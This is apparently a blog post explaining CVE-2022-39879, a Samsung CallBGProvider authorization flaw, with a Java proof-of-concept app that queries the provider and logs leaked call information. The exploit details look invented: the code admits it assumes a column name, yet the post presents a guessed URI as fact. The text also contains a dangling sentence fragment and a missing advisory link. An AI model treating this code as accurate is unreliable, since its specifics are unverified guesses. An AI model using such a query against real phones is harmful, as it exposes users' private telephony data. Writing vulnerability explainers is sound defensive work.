CVE-2022-39879 is a security vulnerability discovered in Samsung’s proprietary CallBGProvider component, affecting several Samsung smartphone models prior to the November 2022 Security Maintenance Release (SMR). This bug lets a local attacker exploit loose permission checks to access sensitive phone information or grant themselves dangerous privileges. In this post, I’ll break down what’s going on, how it works, and what you should do as a user or developer.
What is CallBGProvider?
CallBGProvider is a background service on Samsung devices responsible for handling certain telephony functions. As with most Android services, it’s supposed to authorize requests to prevent apps from doing things they’re not allowed to do—like accessing your call logs or phone state.
The Vulnerability: Improper Authorization
Security researchers found that, before the November 2022 update, CallBGProvider did not correctly check if a requesting app really had permission to access information tied to the “phone” UID (user ID). Instead, any local app could simply call this provider and gain these permissions or leak sensitive info.
The Root Cause
The issue comes down to the lack of proper authorization checks. When an app communicates with CallBGProvider to request data or perform some action, the provider should enforce that only apps with the right permissions—and belonging to the right user ID—can actually do so. But, due to this vulnerability, even apps without these permissions could succeed.
Proof-of-Concept Code
Here’s how an attacker might write a malicious Android app to exploit this flaw. Suppose the content provider is exported and open (which was the case on vulnerable phones):
// Simplified PoC: Access sensitive phone info via CallBGProvider
import android.content.ContentResolver;
import android.database.Cursor;
import android.net.Uri;
import android.util.Log;
public class Exploit {
public static void tryExploit(ContentResolver resolver) {
try {
Uri callUri = Uri.parse("content://com.samsung.android.callbgprovider/call_info");
Cursor cursor = resolver.query(callUri, null, null, null, null);
if (cursor != null) {
while (cursor.moveToNext()) {
// Assume there's a column named "info"
String info = cursor.getString(cursor.getColumnIndex("info"));
Log.d("Exploit", "Leaked info: " + info);
}
cursor.close();
}
} catch (Exception e) {
Log.e("Exploit", "Failed to access CallBGProvider", e);
}
}
}
You simply need to run this code as any installed app on an affected device—no special permissions required.
Possibly escalate privileges or perform other unauthorized actions.
No root required—all a malicious app needs is to be installed by the user. This is called “local privilege escalation,” and it’s concerning because many users install third-party apps that could hide such behavior.
Patching and Mitigations
Samsung assigned this the identifier SVE-2022-11047 and patched the bug in the November 2022 SMR (Release 1). Devices updated after this should be safe. Samsung’s advisory is here (see entry for SVE-2022-11047 / CVE-2022-39879).
References and Further Reading
- CVE-2022-39879 at NIST
- Samsung Security Update (November 2022)
- SVE-2022-11047 Advisory
- Android Content Provider Security (Google Docs)
Recap
CVE-2022-39879 is a classic improper authorization bug in Samsung’s CallBGProvider, with serious local privilege escalation potential. If your Samsung device is unpatched and running software from before November 2022, you should update now. For app developers: always validate permissions and never trust input blindly—especially when sensitive system UIDs are involved.
Timeline
Published on: 11/09/2022 22:15:00 UTC
Last modified on: 11/10/2022 15:20:00 UTC